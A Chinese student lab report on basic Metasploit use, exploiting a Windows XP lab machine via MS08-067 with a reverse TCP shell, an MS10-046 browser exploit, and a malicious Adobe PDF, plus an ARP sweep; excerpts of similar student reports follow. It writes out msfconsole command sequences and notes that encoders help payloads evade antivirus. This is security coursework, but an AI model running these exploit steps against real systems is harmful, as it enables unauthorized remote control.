20154309 【网络对抗技术】Exp5:MSF基础应用

20154309 【网络对抗技术】Exp5:MSF基础应用

一、原理与实践说明

1.实践内容

本实践目标是掌握metasploit的基本应用方式,掌握重点常用的三种攻击方式的思路。具体需要完成:

· 一个主动攻击实践,如ms08-067; (1分)

· 一个针对浏览器的攻击,如ms11-050;(1分)

· 一个针对客户端的攻击,如Adobe;(1分)

· 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

2.预备知识

一、MSF的六种模块

· Exploit 模块

  • 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。
  • 形象点来说就是攻击模块

· Payload 模块

  • 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。

· Encoder 模块

  • 针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征
  • 不改变payload作用,但能对payload进行加工

· Aux 模块

  • 能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
  • 主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。

· Post 模块

  • 支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作
  • 这里主要指的是攻击之后可能用到的模块

· Nops 模块

  • 是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,最典型的空指令就是空操作,在X86 CPU体系架构平台上的操作码是0x90
  • 因为有些代码返回地址很难确认,所以在实际中有时候会填充一大段空指令,便于快速确定返回地址的位置

二、MSF常用漏洞利用命令

  • search name:用指定关键字搜索可以利用的漏洞模块
  • use exploit name:使用漏洞
  • show options:显示配置选项
  • set option name option:设置选项
  • show payloads:回链攻击载荷
  • show targets 显示目标(os版本)
  • set TARGET target number:设置目标版本
  • exploit:开始漏洞攻击
  • sessions -l:列出会话
  • sessions -i id:选择会话
  • sessions -k id:结束会话
  • Ctrl+z:把会话放到后台
  • Ctrl+c:结束会话
  • show auxiliary:显示辅助模块
  • use auxiliary name :使用辅助模块
  • set option name option:设置选项
  • exploit:运行模块

3.基础问题

  • 用自己的话解释什么是exploit , payload , encode
  • exploit : 对远程目标机进行攻击控制的攻击模块
  • payload : 攻击者在目标系统上执行的一段攻击代码,该代码具有反弹连接,创建用户,执行其他系统命令的功能。
  • encode : encode编码一是为了避免使攻击载荷不能完整运行的“坏字符”,二是为了改变特征码,帮助攻击载荷避免被杀软发现。

二、实践过程

攻击机:kali 靶机:winxp 的IP地址

1.Windows服务渗透攻击——MS08-067安全漏洞

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(ms08_067_netapi) > show payloads
  • msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
  • msf exploit(ms08_067_netapi) > set LHOST 192.168.186.132 //攻击机ip
  • msf exploit(ms08_067_netapi) > set LPORT 4309 //攻击端口
  • msf exploit(ms08_067_netapi) > set RHOST 192.168.186.131 //靶机ip,特定漏洞端口已经固定
  • msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
  • msf exploit(ms08_067_netapi) > exploit //攻击

    成功建立会话,攻击成功。

2.浏览器渗透攻击——MS10_046

这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

search指令查找攻击程序,选择第一个,设置SRVHOST和LHOST等参数

运行,生成了一个URL,把这个URL复制到XP里面,然后打开。

在XP浏览器中打开,出现以下界面:

Linux源源不断接收信号

使用sessions指令查看当前存在的会话,可以看到存在一个ID为1的会话

使用sessions -i 1选择会话1,成功获取了靶机的shell,利用ipconfig指令查看靶机的IP地址:

3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

选择use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块,设置回连的payload、相关地址、端口号以及生成文件名

显示隐藏的文件,找到这个文件。

将文件复制到靶机XP上

在kali上输入back退出当前模块,进入监听

在靶机上打开liuyanqing_2015439.pdf文件,攻击机显示攻击成功

4.Metasploit辅助模块之——信息收集模块

使用show auxiliary查看可以运用的辅助模块。

选择信息收集模块:扫描局域网有多少主机存活——使用discovery/arp_sweep模块

msf > use auxiliary/scanner/discovery/arp_sweep (使用discovery/arp_sweep模块)

  1. msf auxiliary(arp_sweep) > show options (查看选项)
  2. msf auxiliary(arp_sweep) > set RHOSTS 192.168.186.0/24(目标网段)
  3. msf auxiliary(arp_sweep) > set THREADS 10(线程)
  4. msf auxiliary(arp_sweep) > exploit(开始)

以下为对所在局域网进行扫描后的结果:

三、实践总结及体会

通过本次实验,了解了MSF基本组成原理和构成机理与相应模块的应用。目前实验的漏洞对相关的配置环境以及操作系统和软件版本都有细致的要求,有一定的限制,很大一部分时间花费在配置环境上。

这是与真实实践的差距之一。

原文地址:https://www.cnblogs.com/20154309lyq/p/8978820.html

时间: 2024-11-11 10:02:18

20154309 【网络对抗技术】Exp5:MSF基础应用的相关文章

2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用 1.实验内容 1.1一个主动攻击实践,如ms08_067(成功) 1.2 一个针对浏览器的攻击,如ms11_050(成功) 1.3 一个针对客户端的攻击,如Adobe(成功) 1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功) 2.基础问题回答:用自己的话解释什么是exploit,payload,encode. exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中.

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

20145321 《网络对抗技术》 MSF基础应用

20145321 <网络对抗技术> MSF基础应用 MS08_067漏洞渗透攻击 先查看kali和windows的IP地址 进入msfconsole,选择使用ms08_067的exploit,再选择具体要负载使用的payload,设置载荷,主机ip,靶机ip 输入exploit命令即可攻击客户端.获取shell.可查看靶机IP

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23

20155333 《网络对抗》 Exp5 MSF基础应用

20155333 <网络对抗> Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:攻击手段,是能使攻击武器(payload)的方法: payload:攻击武器,真正具有攻击性的代码: encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行. 实践 一个主动攻击实践,如ms08_067 ①攻击机:kali ②靶机:windows XP SP3(English) 在攻击机kali输入m

20155331《网络对抗》Exp5 MSF基础应用

20155331<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode 答:exploit就是漏洞利用.exploit就是利用一切可以利用的工具.采用一切可以采用的方法.找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档.添加自定义用户.甚至侵入网站获得管理员权限控制整个网站的最终目的. payload是攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码. encode是编码,实现

20155326刘美岑《网络对抗》Exp5 MSF基础应用

基础问题回答 解释exploit,payload,encode是什么: exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令. payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体. encode:是重新进行编码,伪装此次攻击,躲过查杀. 实验过程记录 主动攻击实践:ms06_040 首先,在实验前,检查两个虚拟机能否互相ping通 在kali中打开msf 我首先尝试使用ms06_040进行主动攻击 之后,用show targets查看该漏洞可以攻击的系统版

20145235李涛《网络对抗》Exp5 MSF基础应用

基础问答 用自己的话解释什么是exploit,payload,encode? exploit:相当于搬运工,把攻击代码传送到靶机中. payload:相当于shellcode. encode:相当于包装者,对攻击代码进行编码. adobe_toolbutton漏洞工具 首先生成后门程序 传到到靶机 设置监听,在靶机上打开后门程序,发现攻击成功,查看靶机的信息 ms08_067漏洞攻击 这个攻击需要设置攻击机和靶机的ip地址,然后直接开始攻击 攻击成功,可以查看到靶机的系统信息 ms10_046漏